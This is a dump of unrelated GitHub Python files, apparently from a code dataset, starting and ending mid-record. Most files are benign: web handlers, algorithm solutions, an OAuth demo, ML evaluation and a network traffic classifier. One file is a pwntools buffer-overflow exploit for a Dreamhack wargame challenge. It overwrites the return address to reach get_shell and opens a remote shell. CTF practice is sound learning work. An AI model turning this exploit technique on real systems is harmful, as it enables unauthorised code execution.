points_queue:\n point = point_queue.split('\\n')[0].split(' ')\n # print(point)\n dst_list.write(' %s %s'%(point[0], point[1]))\n\n dst_list.write('\\n')\n\n dst_list.close()\n","repo_name":"Aaronswei/landmark_detection","sub_path":"convertDataFormat.py","file_name":"convertDataFormat.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"73636829810","text":"import os\nimport json\nimport boto3\nfrom serverless_sdk import tag_event\n\nSENDER = os.getenv(\"SENDER\")\nRECEIVER = os.getenv(\"RECEIVER\")\n\nmailer = boto3.client(\"ses\")\n\n\ndef contact(event, context):\n tag_event(\"custom-tag\", \"contact-form\", {\"custom\": {\"tag\": \"data \"}})\n\n print(event)\n data = json.loads(event.get(\"body\"))\n full_name, email = data.get(\"FullName\"), data.get(\"Email\")\n subject, message = data.get(\"Subject\"), data.get(\"Message\")\n\n mailer.send_email(\n Source=SENDER,\n Destination={\"ToAddresses\": [RECEIVER]},\n Message={\n \"Subject\": {\"Data\": f\"[Site] {subject}\", \"Charset\": \"utf-8\"},\n \"Body\": {\n \"Text\": {\n \"Data\": \"Message from: {}, email: {}:\\n---\\n{}\".format(\n full_name, email, message\n ),\n \"Charset\": \"utf-8\",\n }\n },\n },\n )\n\n headers = {\n \"Access-Control-Allow-Origin\": \"*\",\n }\n\n body = {\n \"message\": \"Thank you for your email\",\n }\n\n response = {\"statusCode\": 200, \"headers\": headers, \"body\": json.dumps(body)}\n\n return response\n","repo_name":"aihaddad/sls-contact-form","sub_path":"handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":1168,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"20"} +{"seq_id":"37488797943","text":"import sys\n\nX = int(sys.stdin.readline())\n\nL = [64]\n\nwhile(X < sum(L)):\n s_idx = L.index(min(L))\n s = min(L)\n L[s_idx] = s/2\n\n if(X > sum(L)):\n L.append(s/2)\nprint(len(L))\n","repo_name":"kkimlee/Algorithm","sub_path":"Baekjoon/Python/1064.py","file_name":"1064.py","file_ext":"py","file_size_in_byte":191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"20916471987","text":"import os\n\nfrom flask import Flask, request, redirect, session, url_for, render_template\nfrom requests_oauthlib import OAuth2Session\n\napp = Flask(__name__)\napp.secret_key = \"secret\"\napp.template_folder = \"templates/client\"\n\n# this client is created in server.py\nclient_id = \"client-id\"\nclient_secret = \"client-secret\"\n\n# Authorization code and token url\nauthorization_base_url = \"http://localhost:5000/oauth/authorize\"\ntoken_url = \"http://localhost:5000/oauth/token\"\n\n# Resource url\nresource_server_url = \"http://localhost:5000/profile\"\n\n\n@app.route(\"/\")\ndef index():\n user = None\n if \"user\" in session:\n user = session[\"user\"]\n\n return render_template(\"home.html\", user=user)\n\n\n@app.route(\"/logout\")\ndef logout():\n session.pop(\"user\", None)\n return redirect(url_for(\".index\"))\n\n\n@app.route(\"/login\")\ndef login():\n \"\"\"\n Redirect the user/resource owner to the OAuth provider (i.e. Github)\n using an URL with a few key OAuth parameters.\n \"\"\"\n server = OAuth2Session(client_id)\n authorization_url, state = server.authorization_url(authorization_base_url)\n\n # State is used to prevent CSRF, keep this for later.\n session[\"oauth_state\"] = state\n return redirect(authorization_url)\n\n\n@app.route(\"/callback\", methods=[\"GET\"])\ndef callback():\n \"\"\"\n Retrieving an access token.\n\n The user has been redirected back from the provider to your registered\n callback URL. With this redirection comes an authorization code included\n in the redirect URL. We will use that to obtain an access token.\n \"\"\"\n\n server = OAuth2Session(client_id, state=session[\"oauth_state\"])\n token = server.fetch_token(\n token_url, client_secret=client_secret, authorization_response=request.url\n )\n\n server = OAuth2Session(client_id, token=token)\n user_info = server.get(resource_server_url).json()\n\n session[\"user\"] = user_info[\"name\"]\n\n return redirect(url_for(\".index\"))\n\n\nif __name__ == \"__main__\":\n # This allows us to use a plain HTTP callback\n os.environ[\"OAUTHLIB_INSECURE_TRANSPORT\"] = \"1\"\n\n app.run(debug=True, port=7000, threaded=False)\n","repo_name":"nguyenkims/oauth-demo","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":2116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"42142301568","text":"from pwn import *\n\n#p = process('./sint')\n#gdb.attach(p, gdb_args=['-q', '-ex init-pwngdb'])\np = remote('host1.dreamhack.games', 20384)\n\ncontext.clear()\ncontext.update(arch='i386', os='linux')\ncontext.log_level='debug'\n\ne = ELF('./sint')\n\ngetshell = e.symbols['get_shell']\n\n\npayload = ''\npayload += 'A'*256\npayload += p32(0)\npayload += p32(getshell)\n\np.sendafter(\"Size: \", str(0)+\"\\x0a\")\np.recvuntil(\"Data: \", payload)\np.send(payload)\n\np.interactive()\n","repo_name":"HyeonBell/CTF-Wargame","sub_path":"dreamhack/sint/exploit.py","file_name":"exploit.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"9287015476","text":"import argparse\nimport os\nimport torch\nfrom functools import partial\nfrom omegaconf import OmegaConf\nfrom main import instantiate_from_config\nfrom ldm.models.diffusion.ddim import DDIMSampler\nfrom ldm.data import testsets\n\n\nparser = argparse.ArgumentParser(description='Frame Interpolation Evaluation')\n\nparser.add_argument('--config', type=str, default=None)\nparser.add_argument('--ckpt', type=str, default=None)\nparser.add_argument('--dataset', type=str, default='Middlebury_others')\nparser.add_argument('--metrics', nargs='+', type=str, default=['PSNR', 'SSIM', 'LPIPS'])\nparser.add_argument('--data_dir', type=str, default='D:\\\\')\nparser.add_argument('--out_dir', type=str, default='eval_results')\nparser.add_argument('--resume', dest='resume', default=False, action='store_true')\n\n# sampler args\nparser.add_argument('--use_ddim', dest='use_ddim', default=False, action='store_true')\nparser.add_argument('--ddim_eta', type=float, default=1.0)\nparser.add_argument('--ddim_steps', type=int, default=200)\n\ndef main():\n\n args = parser.parse_args()\n \n # initialise model\n config = OmegaConf.load(args.config)\n model = instantiate_from_config(config.model)\n model.load_state_dict(torch.load(args.ckpt)['state_dict'])\n device = torch.device(\"cuda\") if torch.cuda.is_available() else torch.device(\"cpu\")\n model = model.to(device)\n model = model.eval()\n print('Model loaded successfully')\n\n # set up sampler\n if args.use_ddim:\n ddim = DDIMSampler(model)\n sample_func = partial(ddim.sample, S=args.ddim_steps, eta=args.ddim_eta, verbose=False)\n else:\n sample_func = partial(model.sample_ddpm, return_intermediates=False, verbose=False)\n\n # setup output dirs\n if not os.path.exists(args.out_dir):\n os.makedirs(args.out_dir)\n\n # initialise test set\n print('Testing on dataset: ', args.dataset)\n test_dir = os.path.join(args.out_dir, args.dataset)\n if args.dataset.split('_')[0] in ['VFITex', 'Ucf101', 'Davis90']:\n db_folder = args.dataset.split('_')[0].lower()\n else:\n db_folder = args.dataset.lower()\n test_db = getattr(testsets, args.dataset)(os.path.join(args.data_dir, db_folder))\n if not os.path.exists(test_dir):\n os.mkdir(test_dir)\n test_db.eval(model, sample_func, metrics=args.metrics, output_dir=test_dir, resume=args.resume)\n\n\n\nif __name__ == '__main__':\n main()","repo_name":"danier97/LDMVFI","sub_path":"evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":2387,"program_lang":"python","lang":"en","doc_type":"code","stars":61,"dataset":"github-code","pt":"20"} +{"seq_id":"39476525107","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n\r\nimport sys\r\nimport json\r\nimport os\r\n\r\nINPUT_FOLDER = 'database/monitors/'\r\n\r\ndef read_json(file_name):\r\n if(not os.path.isfile(file_name)):\r\n raise Exception('File ' + file_name + ' does not exist. Build it first.')\r\n\r\n with open(file_name, 'r') as file:\r\n data = json.loads(file.read())\r\n return data\r\n\r\ndef main():\r\n missing_fields = []\r\n \r\n database_files = [INPUT_FOLDER + f for f in os.listdir(INPUT_FOLDER) if os.path.isfile(os.path.join(INPUT_FOLDER, f))]\r\n for database_file in database_files:\r\n data = read_json(database_file)\r\n\r\n if not \"name\" in data:\r\n missing_fields.append(\" - Mandatory field 'name' is missing in file %s\\n\" % database_file)\r\n if not \"doc\" in data:\r\n missing_fields.append(\" - Mandatory field 'doc' is missing in file %s\\n\" % database_file)\r\n if not \"baudrate\" in data:\r\n missing_fields.append(\" - Mandatory field 'baudrate' is missing in file %s\\n\" % database_file)\r\n if not \"stopbit\" in data:\r\n missing_fields.append(\" - Mandatory field 'stopbit' is missing in file %s\\n\" % database_file)\r\n if not \"parity\" in data:\r\n missing_fields.append(\" - Mandatory field 'parity' is missing in file %s\\n\" % database_file)\r\n if not \"commands\" in data:\r\n missing_fields.append(\" - Mandatory field 'commands' is missing in file %s\\n\" % database_file)\r\n\r\n if len(missing_fields) > 0:\r\n message = \"Some mandatory fields are missing:\\n\"\r\n for missing_field in missing_fields:\r\n message = message + missing_field\r\n raise Exception(message)\r\n \r\n print(\"No mandatory field is missing\")\r\n\r\nif __name__ == \"__main__\":\r\n main()","repo_name":"YooUp/RS232-Monitor-Database","sub_path":"devscript/check_mandatory_fields.py","file_name":"check_mandatory_fields.py","file_ext":"py","file_size_in_byte":1781,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"20"} +{"seq_id":"17468381655","text":"from django.template import Template, Context\nfrom django.template.loader import render_to_string\nfrom django.conf import settings\n\n\ndef parse(kwargs, template_name=\"shortcodes/vimeo.html\"):\n video_id = kwargs.get('id')\n if video_id:\n width = int(kwargs.get(\n 'width',\n getattr(settings, 'SHORTCODES_VIMEO_WIDTH', 480))\n )\n height = int(kwargs.get(\n 'height',\n getattr(settings, 'SHORTCODES_VIMEO_HEIGHT', 385))\n )\n\n ctx = {\n 'video_id': video_id,\n 'width': width,\n 'height': height\n }\n return render_to_string(template_name, ctx)\n","repo_name":"mobolic/django-shortcodes","sub_path":"shortcodes/parsers/vimeo.py","file_name":"vimeo.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"20"} +{"seq_id":"38898226305","text":"import pygame, time, configparser\nfrom savehelper import *\n\n#vars\nsize = (800,600)\nscreen = pygame.display.set_mode(size)\nsmallfont = pygame.font.SysFont('Comic Sans MS', 20)\nmediumfont = pygame.font.SysFont('Comic Sans MS', 30)\nbigfont = pygame.font.SysFont('Comic Sans MS', 45)\nclock = pygame.time.Clock()\n\nBLUE = ((0,0,255))\nBLACK = ((0,0,0))\nWHITE = ((255,255,255))\n\nloadimage = pygame.image.load('load.png').convert_alpha()\nnewimage = pygame.image.load('new.png').convert_alpha()\n\nload = pygame.Rect(300,100,300,200)\nnew = pygame.Rect(300,350,300,200)\nloadt = bigfont.render(\"Load Game\", False, (255,0,0))\nnewt = bigfont.render(\"New Game\", False, (255,0,0))\nscreen.blit(loadimage,load)\nscreen.blit(newimage,new)\npygame.display.update()\n\ndone3 = False\nwhile not done3:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n if event.type == pygame.MOUSEBUTTONDOWN:\n mouse_pos = event.pos\n if load.collidepoint(mouse_pos):\n choice = \"l\"\n done3 = True\n if new.collidepoint(mouse_pos):\n choice = \"n\"\n done3 = True\n\nscreen.fill(BLACK)\ninputbox = pygame.Rect(300,200,300,50)\npygame.draw.rect(screen, WHITE, inputbox)\nif choice == \"l\":\n message = mediumfont.render(\"Input game name to load\", False, (255,0,0))\nelif choice == \"n\":\n message = mediumfont.render(\"Input game name to create\", False, (255,0,0))\nscreen.blit(message, inputbox)\npygame.display.update()\ndone3 = False\nactive = False\ntext = \"\"\nwhile not done3:\n pygame.draw.rect(screen, WHITE, inputbox)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n if event.type == pygame.MOUSEBUTTONDOWN:\n mouse_pos = event.pos\n if inputbox.collidepoint(mouse_pos):\n active = not active\n else:\n active = False\n if event.type == pygame.KEYDOWN:\n if active:\n if event.key == pygame.K_RETURN:\n done3=True\n elif event.key == pygame.K_BACKSPACE:\n text = text[:-1]\n else:\n text += event.unicode\n textt = bigfont.render(text,False,(255,0,0))\n if active == True:\n screen.blit(textt,inputbox)\n elif text == \"\":\n screen.blit(message,inputbox)\n else:\n screen.blit(textt,inputbox)\n pygame.display.update()\n clock.tick(60)\n\n\nloadcreatesave(text, choice, {\"streak\":1, \"score\":0, \"playerx\": 0, \"playery\": 0, \"flagx\":0, \"flagy\":0, \"bombs\":[], \"startx\":0, \"starty\":0, \"complete\":True})\n\nsave = config[\"save\"]\n","repo_name":"Will-Harmer/mazegame","sub_path":"titlescreen.py","file_name":"titlescreen.py","file_ext":"py","file_size_in_byte":2719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"28369969712","text":"import sys\ninput = sys.stdin.readline\noutput = sys.stdout.write\n\nN = int(input())\nst = 1\nwhile st<=N:\n st<<=1\ntree = [0]*(st<<1)\nlazy = [0]*(st<<1)\n\nfor idx,num in enumerate(list(map(int,input().split()))):\n tree[idx+st] = num\n\ntemp = st\nwhile temp>1:\n ed = temp\n temp>>=1\n for idx in range(temp,ed):\n tree[idx] = tree[idx<<1]+tree[idx<<1|1]\n\ndef propagate(node, ns, ne):\n if lazy[node]:\n tree[node] +=lazy[node]\n if ns!=ne:\n lazy[node<<1] += lazy[node]\n lazy[node<<1|1] += lazy[node]\n lazy[node] = 0\n\ndef update(ns,ne,s,e,node,k):\n propagate(node,ns,ne)\n if ns>e or ne>1\n update(ns,mid,s,e,node<<1,k)\n update(mid+1,ne,s,e,node<<1|1,k)\n tree[node]=tree[node<<1]+tree[node<<1|1]\n\ndef query(ns,ne,s,e,node):\n propagate(node,ns,ne)\n if ene: return 0\n if s<=ns and ne<=e: return tree[node]\n mid = (ne+ns)>>1\n return query(ns,mid,s,e,node<<1) + query(mid+1,ne,s,e,node<<1|1)\n\nM = int(input())\nfor i in range(M):\n row = list(map(int,input().split()))\n if row[0]==1:\n update(1,st,row[1],row[2],1,row[3])\n else:\n output(\"%d\\n\"%query(1,st,row[1],row[1],1))","repo_name":"seono/algorithm","sub_path":"python/plat4/16975.py","file_name":"16975.py","file_ext":"py","file_size_in_byte":1347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"72244510129","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jul 22 17:23:50 2020\n \nUpper Confidence Bound (UCB)\n \n\n@author: David Andrade / @Bits2Matter\n\"\"\"\n\nimport numpy as np \nimport matplotlib as plt\nimport pandas as pd \n\n# Read dataset \ndataset = pd.read_csv(\"Ads_CTR_Optimisation.csv\")\n\n\n# UCB algorithm\nimport math\nN = 10000\nd = 10\nnumber_selections = [0] * d \nsums_rewards = [0] * d\nads_selected = []\ntotal_reward = 0\nfor n in range(0, N):\n max_upper_bound = 0\n ad = 0\n for i in range(0, d):\n if(number_selections[i] > 0):\n \n mean_reward = sums_rewards[i] / number_selections[i]\n delta_i = math.sqrt(3/2 * math.log(n+1) / number_selections[i])\n upper_bound = mean_reward + delta_i\n else:\n upper_bound = 1e400\n \n if (upper_bound > max_upper_bound):\n max_upper_bound = upper_bound\n ad = i \n \n ads_selected.append(ad)\n number_selections[ad] = number_selections[ad] + 1\n reward = dataset.values[n, ad] \n sums_rewards[ad] = sums_rewards[ad] + reward\n total_reward = total_reward + reward\n\n\n\n# Vis results - hist\nplt.hist(ads_selected)\nplt.title(\"Hist of ads selections\")\nplt.xlabel(\"Ads\")\nplt.ylabel(\" # of times each ad was selected\")\nplt.show()\n\n\n# Thats better ","repo_name":"DavidAndrade27/DataScienceAndMLBassics","sub_path":"IA_dovo_r/6 _Reinforcement Learning/Upper Confidence Bound (UCB)/Upper_confidence_bound.py","file_name":"Upper_confidence_bound.py","file_ext":"py","file_size_in_byte":1297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"18928187987","text":"from xml.dom import minidom\nfrom xml.dom.minidom import Node\n\n\ndef remove_blanks(node):\n for x in node.childNodes:\n if x.nodeType == Node.TEXT_NODE:\n if x.nodeValue:\n x.nodeValue = x.nodeValue.strip()\n elif x.nodeType == Node.ELEMENT_NODE:\n remove_blanks(x)\n\n\ndef get_cleaned_node(node_xml):\n \"\"\"Strip text values in XML.\"\"\"\n parsed = minidom.parseString(node_xml)\n remove_blanks(parsed)\n parsed.normalize()\n ret = parsed.toxml('utf-8')\n return ret.decode('utf-8')\n","repo_name":"mksh/aiobasex","sub_path":"aiobasex/test/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"20"} +{"seq_id":"14392059822","text":"# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or\n# implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n#*** nmeta - Network Metadata - Policy Interpretation Class and Methods\n\n\"\"\"\nThis module is part of the nmeta2 suite\n.\nIt provides an object for traffic classification\nand includes ingesting the policy from YAML and checking\npackets against policy, calling appropriate classifiers\nand returning actions.\n.\nVersion 2.x Toulouse Code\n\"\"\"\n\n#*** Logging imports:\nimport logging\nimport logging.handlers\nimport coloredlogs\n\n#*** General imports:\nimport socket\nimport sys\nimport struct\n\n#*** Import dpkt for packet parsing:\nimport dpkt\n\n#*** To represent TCP flows and their context:\nimport flow\n\n#*** For importing custom classifiers:\nimport importlib\n\nclass TC(object):\n \"\"\"\n This class is instantiated by nmeta2_dpae.py and provides methods\n to ingest the policy as yaml and check\n packets against policy, calling appropriate classifiers\n and returning actions.\n \"\"\"\n def __init__(self, _config):\n #*** Get logging config values from config class:\n _logging_level_s = _config.get_value \\\n ('tc_logging_level_s')\n _logging_level_c = _config.get_value \\\n ('tc_logging_level_c')\n _syslog_enabled = _config.get_value('syslog_enabled')\n _loghost = _config.get_value('loghost')\n _logport = _config.get_value('logport')\n _logfacility = _config.get_value('logfacility')\n _syslog_format = _config.get_value('syslog_format')\n _console_log_enabled = _config.get_value('console_log_enabled')\n _coloredlogs_enabled = _config.get_value('coloredlogs_enabled')\n _console_format = _config.get_value('console_format')\n #*** Set up Logging:\n self.logger = logging.getLogger(__name__)\n self.logger.setLevel(logging.DEBUG)\n self.logger.propagate = False\n\n #*** Syslog:\n if _syslog_enabled:\n #*** Log to syslog on host specified in config.yaml:\n self.syslog_handler = logging.handlers.SysLogHandler(address=(\n _loghost, _logport),\n facility=_logfacility)\n syslog_formatter = logging.Formatter(_syslog_format)\n self.syslog_handler.setFormatter(syslog_formatter)\n self.syslog_handler.setLevel(_logging_level_s)\n #*** Add syslog log handler to logger:\n self.logger.addHandler(self.syslog_handler)\n #*** Console logging:\n if _console_log_enabled:\n #*** Log to the console:\n if _coloredlogs_enabled:\n #*** Colourise the logs to make them easier to understand:\n coloredlogs.install(level=_logging_level_c,\n logger=self.logger, fmt=_console_format, datefmt='%H:%M:%S')\n else:\n #*** Add console log handler to logger:\n self.console_handler = logging.StreamHandler()\n console_formatter = logging.Formatter(_console_format)\n self.console_handler.setFormatter(console_formatter)\n self.console_handler.setLevel(_logging_level_c)\n self.logger.addHandler(self.console_handler)\n\n #*** Initialise Identity Harvest flags (they get set at DPAE join time)\n self.id_arp = 0\n self.id_lldp = 0\n self.id_dns = 0\n self.id_dhcp = 0\n #*** Initialise list for TC classifiers to run:\n self.classifiers = []\n\n #*** Retrieve config values for elephant flow suppression:\n self.suppress_flow_pkt_count_initial = \\\n _config.get_value(\"suppress_flow_pkt_count_initial\")\n self.suppress_flow_pkt_count_backoff = \\\n _config.get_value(\"suppress_flow_pkt_count_backoff\")\n\n #*** Retrieve config values for flow class db connection to use:\n _mongo_addr = _config.get_value(\"mongo_addr\")\n _mongo_port = _config.get_value(\"mongo_port\")\n #*** Instantiate a flow object for classifiers to work with:\n self.flow = flow.Flow(self.logger, _mongo_addr, _mongo_port)\n\n def instantiate_classifiers(self, _classifiers):\n \"\"\"\n Dynamically import and instantiate classes for any\n dynamic classifiers specified in the controller\n nmeta2 main_policy.yaml\n .\n Passed a list of tuples of classifier type / classifer name\n .\n Classifier modules live in the 'classifiers' subdirectory\n .\n \"\"\"\n self.logger.debug(\"Loading dynamic classifiers into TC module\")\n\n for tc_type, module_name in _classifiers:\n #*** Dynamically import and instantiate class from classifiers dir:\n self.logger.debug(\"Importing module type=%s module_name=%s\",\n tc_type, \"classifiers.\" + module_name)\n try:\n module = importlib.import_module(\"classifiers.\" + module_name)\n except:\n exc_type, exc_value, exc_traceback = sys.exc_info()\n self.logger.error(\"Failed to dynamically load classifier \"\n \"module %s from classifiers subdirectory.\"\n \"Please check that module exists and alter\"\n \" main_policy configuration in controller \"\n \"nmeta2 configuration if required\",\n module_name)\n self.logger.error(\"Exception is %s, %s, %s\",\n exc_type, exc_value, exc_traceback)\n sys.exit(\"Exiting, please fix error...\")\n\n #*** Dynamically instantiate class 'Classifier':\n self.logger.debug(\"Instantiating module class\")\n class_ = getattr(module, 'Classifier')\n self.classifiers.append(class_(self.logger))\n\n def classify_dpkt_wrapper(self, pkt, pkt_receive_timestamp, if_name):\n \"\"\"\n Used to catch and handle exceptions in classify_dpkt otherwise\n it can just hang with no explaination... TBD: turn this into\n a decorator...\n \"\"\"\n try:\n result = self.classify_dpkt(pkt, pkt_receive_timestamp, if_name)\n return result\n except:\n exc_type, exc_value, exc_traceback = sys.exc_info()\n self.logger.error(\"classify_dpkt exception %s, %s, %s\",\n exc_type, exc_value, exc_traceback)\n return {}\n\n def classify_dpkt(self, pkt, pkt_receive_timestamp, if_name):\n \"\"\"\n Perform traffic classification on a packet\n using dpkt for packet parsing\n \"\"\"\n result = {'type': 'none', 'subtype': 'none', 'actions': 0}\n ip = 0\n udp = 0\n tcp = 0\n #*** Read into dpkt:\n eth = dpkt.ethernet.Ethernet(pkt)\n #*** Set local variables for efficient access, speed is critical...\n eth_src = mac_addr(eth.src)\n eth_dst = mac_addr(eth.dst)\n eth_type = eth.type\n\n if eth_type == 2048:\n ip = eth.data\n ip_src = socket.inet_ntop(socket.AF_INET, ip.src)\n ip_dst = socket.inet_ntop(socket.AF_INET, ip.dst)\n #*** Check if UDP or TCP:\n if ip.p == 6:\n tcp = ip.data\n tcp_src = tcp.sport\n tcp_dst = tcp.dport\n\n elif ip.p == 17:\n udp = ip.data\n udp_src = udp.sport\n udp_dst = udp.dport\n\n #*** Check for Identity Indicators:\n if udp:\n if udp_src == 53 or udp_dst == 53:\n #*** DNS (UDP):\n return self._parse_dns(udp.data, eth_src)\n\n elif udp_src == 67 or udp_dst == 67:\n #*** DHCP:\n return self._parse_dhcp(udp.data, eth_src)\n\n if tcp:\n if tcp_src == 53 or tcp_dst == 53:\n #*** DNS (TCP):\n return self._parse_dns(tcp.data, eth_src)\n\n if eth_type == 35020:\n #*** LLDP:\n return self._parse_lldp(pkt, eth_src)\n\n if eth_type == 2054:\n #*** ARP:\n return self._parse_arp(eth, eth_src)\n\n #*** The following is TCP specific but shouldn't be... TBD...\n if tcp:\n #*** Read packet into flow object for classifiers to work with:\n self.flow.ingest_packet(pkt, pkt_receive_timestamp)\n\n #*** Run any custom classifiers:\n for classifier in self.classifiers:\n try:\n result_classifier = classifier.classifier(self.flow)\n except:\n exc_type, exc_value, exc_traceback = sys.exc_info()\n self.logger.error(\"Exception in custom classifier %s.\"\n \"Exception %s, %s, %s\",\n classifier, exc_type, exc_value, exc_traceback)\n return result\n\n #*** TBD, this will need updating for more types of return actions:\n if 'qos_treatment' in result_classifier:\n result['qos_treatment'] = result_classifier['qos_treatment']\n result['actions'] = 1\n result['type'] = 'treatment'\n\n #*** Suppress Elephant flows:\n #*** TBD, do on more than just IPv4 TCP...:\n if tcp and self.flow.packet_count >= \\\n self.suppress_flow_pkt_count_initial:\n self.logger.debug(\"Flow is candidate for suppression src_ip=%s \"\n \"src_port=%s dst_ip=%s dst_port=%s\",\n self.flow.ip_src, self.flow.tcp_src,\n self.flow.ip_dst, self.flow.tcp_dst)\n #*** Only suppress if there's been sufficient backoff since\n #*** any previous suppressions to prevent overload of ctrlr\n if not self.flow.suppressed or (self.flow.packet_count > \\\n (self.flow.suppressed + \\\n self.suppress_flow_pkt_count_backoff)):\n #*** Update the suppress counter on the flow:\n self.flow.set_suppress_flow()\n self.logger.debug(\"Suppressing TCP stream src_ip=%s \"\n \"src_port=%s dst_ip=%s dst_port=%s\",\n self.flow.ip_src, self.flow.tcp_src,\n self.flow.ip_dst, self.flow.tcp_dst)\n if result['type'] == 'none':\n result['type'] = 'suppress'\n elif result['type'] == 'treatment':\n result['type'] = 'treatment+suppress'\n else:\n self.logger.error(\"Unknown result type %s\", result['type'])\n else:\n self.logger.debug(\"Deferring suppression TCP stream src_ip=%s \"\n \"src_port=%s dst_ip=%s dst_port=%s\",\n self.flow.ip_src, self.flow.tcp_src,\n self.flow.ip_dst, self.flow.tcp_dst)\n self.logger.debug(\" self.flow.suppressed=%s\",\n self.flow.suppressed)\n\n if result['type'] != 'none':\n #*** Add context to result:\n result['ip_A'] = self.flow.ip_src\n result['ip_B'] = self.flow.ip_dst\n result['proto'] = 'tcp'\n result['tp_A'] = self.flow.tcp_src\n result['tp_B'] = self.flow.tcp_dst\n result['flow_packets'] = self.flow.packet_count\n\n return result\n\n def _parse_dns(self, dns_data, eth_src):\n \"\"\"\n Check if packet is DNS, and if so return a list\n of answers (if exist), with each list item a dict\n of type/name/address/ttl\n \"\"\"\n if self.id_dns:\n #*** DNS:\n self.logger.debug(\"Is it DNS?\")\n try:\n dns = dpkt.dns.DNS(dns_data)\n except dpkt.NeedData:\n self.logger.debug(\"DNS packet no/invalid data\")\n return {}\n queries = dns.qd\n answers = dns.an\n detail1 = []\n for answer in answers:\n if answer.type == 1:\n #*** DNS A Record:\n answer_ip = socket.inet_ntoa(answer.rdata)\n answer_name = answer.name\n answer_ttl = answer.ttl\n self.logger.debug(\"dns_answer_name=%s dns_answer_A=%s \"\n \"answer_ttl=%s\",\n answer_name, answer_ip, answer_ttl)\n record = {'type': 'A',\n 'name': answer_name,\n 'address': answer_ip,\n 'ttl': answer_ttl}\n detail1.append(record)\n elif answer.type == 5:\n #*** DNS CNAME Record:\n answer_cname = answer.cname\n answer_name = answer.name\n self.logger.debug(\"dns_answer_name=%s dns_answer_CNAME=%s\",\n \"answer_ttl=%s\",\n answer_name, answer_cname, answer_ttl)\n record = {'type': 'CNAME',\n 'name': answer_name,\n 'address': answer_cname,\n 'ttl': answer_ttl}\n detail1.append(record)\n else:\n #*** Not a type that we handle yet\n pass\n if len(detail1) > 0:\n result = {'type': 'id', 'subtype': 'dns', 'src_mac': eth_src,\n 'detail1': detail1}\n else:\n result = {}\n self.logger.debug(\"DNS result=%s\", result)\n return result\n else:\n return {}\n\n def _parse_dhcp(self, udp_data, eth_src):\n \"\"\"\n Check if packet is DHCP, and if so return the details\n \"\"\"\n dhcp = dpkt.dhcp.DHCP(udp_data)\n if self.id_dhcp and dhcp:\n #*** DHCP:\n self.logger.debug(\"DHCP details are %s\", dhcp)\n result = {'type': 'id', 'subtype': 'dhcp', 'src_mac': eth_src,\n 'detail1': dhcp}\n return result\n else:\n return {}\n\n def _parse_arp(self, eth, eth_src):\n \"\"\"\n Check if packet is ARP, and if so return the details\n \"\"\"\n if self.id_arp:\n #*** ARP:\n self.logger.debug(\"Is it ARP?\")\n arp = eth.arp\n if arp:\n #*** Build a CSV string of spa,sha,tpa,tha:\n arp_details = socket.inet_ntoa(arp.spa)\n arp_details += \",\" + mac_addr(arp.sha)\n arp_details += \",\" + socket.inet_ntoa(arp.tpa)\n arp_details += \",\" + mac_addr(arp.sha)\n self.logger.debug(\"ARP details are %s\", arp_details)\n result = {'type': 'id', 'subtype': 'arp',\n 'src_mac': eth_src,\n 'detail1': arp_details}\n return result\n else:\n return {}\n else:\n return {}\n\n def _parse_lldp(self, pkt, eth_src):\n \"\"\"\n Check if packet is LLDP, and if so return the details\n \"\"\"\n if self.id_lldp:\n #*** LLDP?, try a decode:\n self.logger.debug(\"Is it LLDP?\")\n payload = pkt[14:]\n system_name, port_id = self._parse_lldp_detail(payload)\n self.logger.debug(\"LLDP MAC=%s system_name=%s port_id=%s\",\n eth_src, system_name, port_id)\n result = {'type': 'id', 'subtype': 'lldp',\n 'src_mac': eth_src,\n 'detail1': system_name}\n return result\n else:\n return {}\n\n def _parse_lldp_detail(self, lldpPayload):\n \"\"\"\n Parse basic LLDP parameters from an LLDP packet payload.\n Based on github code by GoozeyX\n (https://raw.githubusercontent.com/GoozeyX/python_lldp/master/ \\\n lldp_collector.py)\n \"\"\"\n system_name = None\n vlan_id = None\n port_id = None\n\n while lldpPayload:\n tlv_header = struct.unpack(\"!H\", lldpPayload[:2])[0]\n tlv_type = tlv_header >> 9\n tlv_len = (tlv_header & 0x01ff)\n lldpDU = lldpPayload[2:tlv_len + 2]\n if tlv_type == 127:\n tlv_oui = lldpDU[:3]\n tlv_subtype = lldpDU[3:4]\n tlv_datafield = lldpDU[4:tlv_len]\n if tlv_oui == \"\\x00\\x80\\xC2\" and tlv_subtype == \"\\x01\":\n vlan_id = struct.unpack(\"!H\", tlv_datafield)[0]\n\n elif tlv_type == 0:\n # TLV Type is ZERO, Breaking the while 